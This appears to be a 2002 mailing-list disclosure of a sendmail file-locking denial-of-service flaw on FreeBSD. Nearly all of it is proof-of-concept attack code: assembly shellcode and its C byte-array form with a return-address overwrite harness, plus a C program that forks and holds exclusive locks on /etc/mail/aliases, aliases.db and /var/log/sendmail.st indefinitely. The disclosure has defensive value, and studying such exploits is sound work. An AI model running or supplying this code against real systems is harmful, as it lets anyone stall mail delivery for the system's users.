A problem has been identified in sendmail that can result in a denial of 
service attack. Attached is proof of concept code for this issue. 

http://www.sendmail.org/LockingAdvisory.txt 

have a safe Memorial Day folks. 

-KF 

; 
; Safemode.org, written by zillion 2002/05/24 
; http://www.snosoft.com : zillion@snosoft.com 
; http://www.sendmail.org/LockingAdvisory.txt 
; 

BITS 32 

jmp short callit 

doit: 

pop esi 
xor eax,eax 
mov [esi + 20],al 
push eax 
push esi 
mov al,5 
push eax 
int 0x80 

push byte 0x2 
push eax 
mov al,131 
push eax 
int 0x80 

; Where going to stay forever ;-) 

sub cl,0x3 
l00p: 
js l00p 

callit: 
call doit 

db '/etc/mail/aliases.db' 

/* 

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db 
Written by zillion (at http://www.safemode.org && http://www.snosoft.com) 

More info: http://www.sendmail.org/LockingAdvisory.txt 

*/ 

char shellcode[] = 
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80" 
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1" 
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c" 
        "\x69\x61\x73\x65\x73\x2e\x64\x62"; 

int main() 
{ 
  
  int *ret; 
  ret = (int *)&ret + 2; 
  (*ret) = (int)shellcode; 
} 

#include <fcntl.h> 
#include <unistd.h> 

/* 

Stupid piece of code to test the sendmail lock vulnerability on 
FreeBSD. Run this and try sendmail -t on FreeBSD for example. 

More info: http://www.sendmail.org/LockingAdvisory.txt 

zillion (at safemode.org && snosoft.com) 
http://www.safemode.org 
http://www.snosoft.com 

*/ 

int main() { 

  if(fork() == 0) { 

    char *lock1 = "/etc/mail/aliases"; 
    char *lock2 = "/etc/mail/aliases.db"; 
    char *lock3 = "/var/log/sendmail.st"; 

    int fd; 
    fd = open(lock1,O_RDONLY); 
    flock(fd,0x02); 

    fd = open(lock2,O_RDONLY); 
    flock(fd,0x02); 

    fd = open(lock3,O_RDONLY); 
    flock(fd,0x02); 

    /* We are here to stay! */ 

    for(;;) {} 

  } 
}